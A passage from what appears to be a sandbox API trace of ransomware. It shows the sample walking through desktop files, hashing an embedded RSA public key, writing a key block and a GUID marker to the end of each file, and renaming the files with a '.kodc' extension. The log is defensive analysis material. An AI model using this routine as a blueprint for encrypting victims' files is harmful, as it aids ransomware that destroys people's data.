ftLastWriteTime.dwHighDateTime=0x1d5bafd, nFileSizeHigh=0x0, nFileSizeLow=0xe07c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z04lPziTG1LwOrtQt.png", cAlternateFileName="Z04LPZ~1.PNG")) returned 1 [0100.808] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.808] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x32f3058 [0100.808] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0100.808] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\Z04lPziTG1LwOrtQt.png") returned=".png" [0100.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\Z04lPziTG1LwOrtQt.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kmpcg-yoqu21bwvljwxx\\z04lpzitg1lwortqt.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.808] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=57468) returned 1 [0100.808] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.811] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe056, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.811] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.812] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.812] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.812] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xe07c, lpOverlapped=0x0) returned 1 [0100.812] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.812] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.812] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.812] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0100.813] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.813] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.813] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.813] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.813] GetLastError () returned 0x0 [0100.814] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.814] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0100.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.814] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.814] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.814] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe080) returned 0x9bb8968 [0100.814] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.814] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0100.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5aa0 [0100.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e30 [0100.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5ae8 [0100.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e48 [0100.814] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e78 [0100.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e90 [0100.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.815] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0100.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e78 | out: hHeap=0x630000) returned 1 [0100.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e90 | out: hHeap=0x630000) returned 1 [0100.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0100.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7e90 [0100.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7e78 [0100.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0100.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0100.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0100.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.815] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e90 | out: hHeap=0x630000) returned 1 [0100.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e78 | out: hHeap=0x630000) returned 1 [0100.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.815] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0100.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.816] GetCurrentThreadId () returned 0x42c [0100.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba76a8 [0100.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.816] GetCurrentThreadId () returned 0x42c [0100.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0100.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.816] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.816] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e78 [0100.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0100.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e90 [0100.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e60 [0100.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7ea8 [0100.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79c8 [0100.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0100.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.817] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.817] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e78 | out: hHeap=0x630000) returned 1 [0100.818] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e78 [0100.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.818] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe07c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.818] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.818] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.818] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.818] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.819] CloseHandle (hObject=0x5cc) returned 1 [0100.828] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\Z04lPziTG1LwOrtQt.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kmpcg-yoqu21bwvljwxx\\z04lpzitg1lwortqt.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\Z04lPziTG1LwOrtQt.png.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kmpcg-yoqu21bwvljwxx\\z04lpzitg1lwortqt.png.kodc")) returned 1 [0100.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0100.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.829] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f3058 | out: hHeap=0x630000) returned 1 [0100.831] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafa2960, ftCreationTime.dwHighDateTime=0x1d5bf85, ftLastAccessTime.dwLowDateTime=0x72f2bc10, ftLastAccessTime.dwHighDateTime=0x1d5c1cb, ftLastWriteTime.dwLowDateTime=0x72f2bc10, ftLastWriteTime.dwHighDateTime=0x1d5c1cb, nFileSizeHigh=0x0, nFileSizeLow=0x2b91, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZHTOAxESRSu4ZX.mp3", cAlternateFileName="ZHTOAX~1.MP3")) returned 1 [0100.831] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\ZHTOAxESRSu4ZX.mp3") returned=".mp3" [0100.831] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\ZHTOAxESRSu4ZX.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kmpcg-yoqu21bwvljwxx\\zhtoaxesrsu4zx.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.831] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=11153) returned 1 [0100.831] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.834] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x2b6b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.834] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.835] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.835] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.835] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x2b91, lpOverlapped=0x0) returned 1 [0100.835] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.835] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.835] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.835] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.835] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0100.836] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.836] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.836] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.836] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.836] 